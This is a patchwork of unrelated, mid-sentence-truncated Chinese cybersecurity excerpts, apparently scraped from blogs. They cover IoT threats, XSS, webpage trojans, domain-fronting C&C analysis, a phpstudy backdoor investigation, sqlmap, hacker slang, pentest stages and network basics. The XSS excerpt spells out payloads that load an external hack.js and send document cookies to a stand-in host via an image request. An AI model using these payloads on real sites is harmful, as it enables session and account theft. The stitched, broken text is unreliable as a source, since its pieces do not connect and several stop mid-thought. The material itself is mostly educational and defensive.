网络安全

联网设备如今已***到我们生活的方方面面，从家居到工厂无处不在，恶意***如今手握大把形形色色的终端目标。 踏入新十年，物联网安全领域逐渐成熟，但也伴随着新一波的风险。 就在不久之前，“物联网安全” 这个术语听起来还有点自相矛盾。但现在，对物联网安全重要性的认知已经达到了空前的高度。联网设备如今已***到我们生活的方方面面，从家居到工厂无处不在，恶意***如今手握大把形形色色的终端目标。现在我们就来预测一下，来年网络安全领域的猫鼠游戏中会出现些什么。 1. 智能楼宇安全问题引人关注 2020 年，智能楼宇安全问题可能会成为设施管理者的首要考虑。Gartner 的调查研究表明，2020 年，80% 的联网设备与楼宇相关，智能楼宇为对手提供了新的***途径。但在明年此类***会不会大幅增加的问题上，专家们意见不一。Honeywell Building Solutions 网络安全全球总监 Mirel Sehic 预期会出现大幅增长。***者可能将楼宇管理系统作为跳板，用以获取 IT 数据，以及操纵建筑控制。 Kudelski Security 首席执行官 Andrew Howard 表示：我不认为明年会看到更多此类***，因为很多建筑内部的网络都是高度隔离的。 尽管可能会有一两个系统接入互联网，但事实上大部分系统都没有联网。即便联网，通常也是 VLAN 隔离的

1. xss： cross site scripting，跨站脚本攻击。 1.1 定义： 指的是通过存在安全漏洞的web网站注册用户的浏览器内运行非法的非本站点HTML标签或js进行的一种攻击方式。 1.2 影响： 利用虚假输入表单骗取用户个人信息。利用脚本窃取用户cookie值，帮助攻击者发送恶意请求（如伪造文章或者图片）。 1.3 案例： 1.3.1 反射型：url参数直接注入，案例如下： //1. 正常网站发送请求:参数from=Ace 窗口输入：https://xxx.com/api?from=Ace //2. 尝试xss攻击:js修改弹出弹窗alert() 窗口输入：https://xxx.com/api?from=<script>alert('尝试在当前页面修改js攻击是否成功')</script> //3. 如果尝试xss攻击成功，可以弹出弹窗，则可以尝试用xss获取用户cookie:即执行指定攻击的js代码 窗口输入：https://xxx.com/api?from=<script scr='https://xxx.com/hack.js'></script> //4. 在https://xxx.com/hack.js代码中：获取cookie var img=new Image() img.src='https://xx.com/img?c='+document

现在国内有许多个人或者公司都建立了网站，网站已经成为日常生活的一部分，而网络钓鱼、网络诈骗、网络盗号等安全问题层出不穷。对于个人（商业）网站安全来讲，其网页挂马危害最大，如今的挂马者主要追寻商业利益，木马程序多是量身订做的，隐蔽性强，危害性大，加上近两年来，许多黑客站点以及网络安全培训的兴起，作为一名“工具”黑客，不需要太多的专业知识，只需要看看录像，学会使用软件工具即可，在这种情况下对于个人（商业）网站的安全维护已经成为网络安全的一个研究课题，本文就个人（商业）网站的安全维护，尤其是网页木马的防范进行了探讨，由于水平有限，不足之处，请多包涵。 （一）个人（商业）网站安全隐患分析 对于个人（商业）网站来讲，其安全主要受制以下一些因素： （ 1 ）租用服务器安全。租用服务器安全主要取决于该 ISP 提供商或者虚拟主机等服务提供商自身安全水平。如果该服务器安全无法得到一定程度上的保证，那么个人及其商业网站就无法得到保证。服务器安全主要是指服务器系统设置，补丁更新，防火墙设置， IIS 安全设置，杀毒软件设置等。 注意：现在有很多个人为了追求商业利益，自己随便整一个服务器然后就开始了虚拟主机等服务，这些服务器的安全性往往很差，因此在找虚拟主机和网站空间时一定要认真选择，考虑综合实力相对较强的，否则服务器老是出问题会影响个人（公司）网络业务的开展。 （ 2 ）网站程序安全

​​域前置是服务器支持的一种技术，大家可以把它看成是转发的技术。这种技术和SSL组合到一起检测的难度直接变高，恶意程序真正连接的C&C很难辨别。 恶意程序可以向一个高可信的域名发送请求，使用https协议向它发送请求，发送请求的时候把真正要访问的地址写到hosts里。 当恶意程序把这个数据发到了支持前置域名转发的域前置服务器上以后，这个服务器会根据hosts里填写的地址将请求进行转发。C&C的IP只有转发它的服务器才知道，这种技术给我们带来的最大困难就是没有办法检测。 上图程序向可信域名发起DNS请求 加密数据传输 样本分析过程 想知道C&C是什么我们在关键函数下一个断点，在堆栈里能看到它的hosts，红框是它真正的主机，这就是一个域前置。 要想发起一个网络的数据，可以不依赖任何的系统API（WindowsAPI实际上分两部分，一是应用层，二是内核层） 。 应用层API相当于是内核层这些函数的一个接口，它仅仅是一个接口做一些域处理，然后他通过sysenter中断指令直接调用内核函数。 通信实现方式总结 恶意程序使用这些流量层面的这些实践方法，它也是随着协议的发展而逐步演进。 ​​​​ 来源： CSDN 作者： anquanniu牛油果 链接： https://blog.csdn.net/anquanniu/article/details/103737586

某日，销售接了一个电话，突然告诉我有个某单位服务器中了木马被黑，具体情况未知。由于客户那边比较急，于是我火速赶往客户现场。到现场，客户首先给我看了深信服防火墙拦截记录，显示内网三台机器被入侵。通过沟通了解，被黑服务器为客户微信端服务器，内网可直接与外网通信。事发后，客户自己做了处理，这个操作可能在一定程度上给溯源，理清攻击者入侵思路，造成了一定的障碍（可能黑客利用的程序被客户直接清除）。通过进一步了解，客户用的是phpstudy进行应用的搭建。而且从是2016年下载的版本一直用到现在。 联想到前几天爆出的phpstudy供应链攻击。基本上已经确定服务器被黑的原因。 现场排查 找到服务器上phpstudy安装路径，在如下路径中对文件进行后门检查。 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll 检查情况： php\php-5.2.17\ext\路径下未发现php_xmlrpc.dll后门文件。 php\php-5.4.45\ext\路径下存在php_xmlrpc.dll后门文件。 于是想通过文件内容进行分析，但是发现文件打开失败，无法查看内容。通过文件属性判断出可能为木马或病毒文件（一般木马或病毒文件属性中详细信息都为空）。 木马文件： 正常文件： 本地后门文件分析： 内网排查 通过查看分析

接着上篇文章，你已经对sqlmap有了了解。那么我们今天就进一步了解sqlmap，使用sqlmap对一个网站解剖分析！ SqlMap的程序允许检查网站的SQL注入漏洞，XSS漏洞的存在，并且可以还利用SQL注入。支持多种SQL注入类型和多种数据库。 我们可以使用sqlmap检查网站中是否存在漏洞。 如果该站点容易受到SQL注入的攻击，则骇客可以进行以下攻击： 从数据库接收信息，包括转储（整个）数据库 修改和删除数据库中的信息 在Web服务器上生成外壳（后门） 从数据库获取用户名和密码 搜索管理仪表板（管理页面） 使用登录名和密码登录到管理区域 资料修改 JavaScript代码注入以检索用户数据 作为网络安全员，我们是利用工具去检查网站是否有漏洞，如果有，则将漏洞提交给技术部或者我们自己修复解决！这里绝不是让你学完技术去瞎搞！ 使用sqlmap检查网站 如果站点使用GET方法从用户那里接收数据（当变量名和正在传输的数据都在浏览器的地址栏中可见时），则需要选择存在该变量的页面的地址。它在问号（？）之后，我们选几个网址。例如： http://www.域名/页面.php?id=8 http://www.域名/页面.php?id=22 在第一个URL地址中，变量的名称为id，传递的值为8。在第二个地址中，变量的名称也为id，传输的值为22。 相同的变量名称是针对不同站点的随机匹配

1. 脚本 :（asp、php、jsp……等） 2. MD5 ：不可逆加密 3. HTTP协议 ：HTTP协议定义Web客户端如何从Web服务器请求Web页面,以及服务器如何把Web页面传送给客户端 4. CMS ：内容管理系统（已经写好的管理系统 稍微修改一下就可以直接使用） 5. 框架 ：代码框架 比如cms是已经装修好的房子 框架就是毛坯房 6. 肉鸡 ：被黑客入侵并被长期驻扎的计算机或服务器 7. 抓鸡 ：利用使用量大的程序的漏洞，使用自动化方式获取肉鸡的行为 8. WebShell ：通过Web入侵后留下的后门工具，可以据此对网站服务进行一定程度的控制 9. 漏洞 ：硬件、软件、协议等等的可利用安全缺陷，可能被攻击者利用，对数据进行篡改，控制等 10. 一句话【木马】 ：通过向服务端提交一句简短的代码，配合本地客户端实现webshell功能的木马 11. 提权 ：操作系统低权限的账户将自己提升为管理员权限使用的方法 12. 后门 ：黑客为了对主机进行长期的控制，在机器上终止的一段程序或留下的一个“入口” 13. 跳板 ：使用肉鸡IP来实施攻击其他目标，以便更好的隐藏自己的身份信息 14. 旁站入侵 ：即同服务器下的网站入侵，入侵之后可以通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有：WebRobot、御剑、和web在线查询等 15. C段入侵

渗透测试注意事项： 1：不要进行恶意攻击 2：不要做傻事 3：在没有获得书面授权时，不要攻击任何目标 4：考虑你的行为将会带来的后果 5：如果你干了非法的是，天网恢恢疏而不漏 渗透测试执行标准http://www.pentest-standard.org/ 1：前期交互阶段 在前期交互（Pre-Engagement Interaction）阶段，渗透测试团队与客户组织进行交互讨论，最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。 该阶段通常涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动。 2：情报收集阶段 在目标范围确定之后，将进入情报搜集（Information Gathering）阶段，渗透测试团队可以利用各种信息来源与搜集技术方法，尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。 渗透测试者可以使用的情报搜集方法包括公开来源信息查询、Google Hacking、社会工程学、网络踩点、扫描探测、被动监听、服务查点等。而对目标系统的情报探查能力是渗透测试者一项非常重要的技能，情报搜集是否充分在很大程度上决定了渗透测试的成败，因为如果你遗漏关键的情报信息，你将可能在后面的阶段里一无所获。 3：威胁建模阶段 在搜集到充分的情报信息之后，渗透测试团队的成员们停下敲击键盘，大家聚到一起针对获取的信息进行威胁建模

防火墙 防火墙是指设置在不同安全等级网络之间的一系列部件的组合，也可以通过检测、限制、更改跨越防火墙的数据流，尽可能的对外部屏蔽网络内部的信息、结构和运行状况，以此来实现内部网络的安全保护，在逻辑上，防火墙是一个分离器，一个限制器，一个分析器。有效的监控不同安全等级网络之间的数据流量。 防火墙是可以是硬件设备也可以是软件设备，主要串联在内外网之间，有双向监督的功能。目前主流为“下一代新型防火墙”，新型防火墙注重应用层防护。 防火墙分类及原理 1、包过滤技术 包过滤技术是一种简单、有效的安全控制技术，它工作在网络层，通过在网络间相互连接的设备上加载允许、禁止来自某些特定的源地址、目的地址、TCP端口号等规则，对通过设备的数据包进行检查，限制数据包进出内部网络。 包过滤的最大优点是对用户透明，传输性能高。但由于安全控制层次在网络层、传输层，安全控制的力度也只限于源地址、目的地址和端口号，因而只能进行较为初步的安全控制，对于恶意的拥塞攻击、内存覆盖攻击或病毒等高层次的攻击手段，则无能为力。 2、应用代理技术 应用代理防火墙工作在OSI的第七层，它通过检查所有应用层的信息包，并将检查的内容信息放入决策过程，从而提高网络的安全性。 应用网关防火墙是通过打破客户机／服务器模式实现的。每个客户机／服务器通信需要两个连接：一个是从客户端到防火墙，另一个是从防火墙到服务器。另外

【计算机网络】第一章 概述 1. 局域网与广域网 (1) 局域网：覆盖范围小，自己花钱购买设备，带宽固定，自己维护，长度小于100米，带宽10M 100M 1000M (2) 广域网：距离远 花钱租带宽 (3) Internet： ISP 自己的机房，对网民提供访问Internet连接 2. 访问网站数据传输过程 在浏览器的地址栏输入网址时，输入的是一个URL的域名，而这个域名需要解析成为IP地址，才能让我们与远程的主机进行管理。而将URL解析成为IP，就变得至关重要，这一过程就是DNS解析的过程(http://www.91xueit.com DNS解析为 13.0.0.2) 获取当前MAC地址，从起始点出发，每到一个节点，更换一次Mac地址，在物理层转化为比特流一直到目的地。 发送数据1，m4接收到后，发送请求数据2指令，m1缓存中删除数据1，发送数据2. 3. OSI参考模型 理解OSI参考模型分层 (1)OSI参考模型对网络排错指 物理层故障： 查看连接状态、发送和接受的数据包 数据链路层故障：MAC冲突 、ADSL欠费、网速没办法协商一致、计算机连接到错误的VLAN 网络层故障： 配置错误的IP地址，子网掩码，网关、路由器没有配置到达目标网络的路由 应用层故障： 应用程序配置错误 (2)OSI参考模型和网络安全 物理层安全 数据链路层安全： ADSL账号密码，数据链路层安全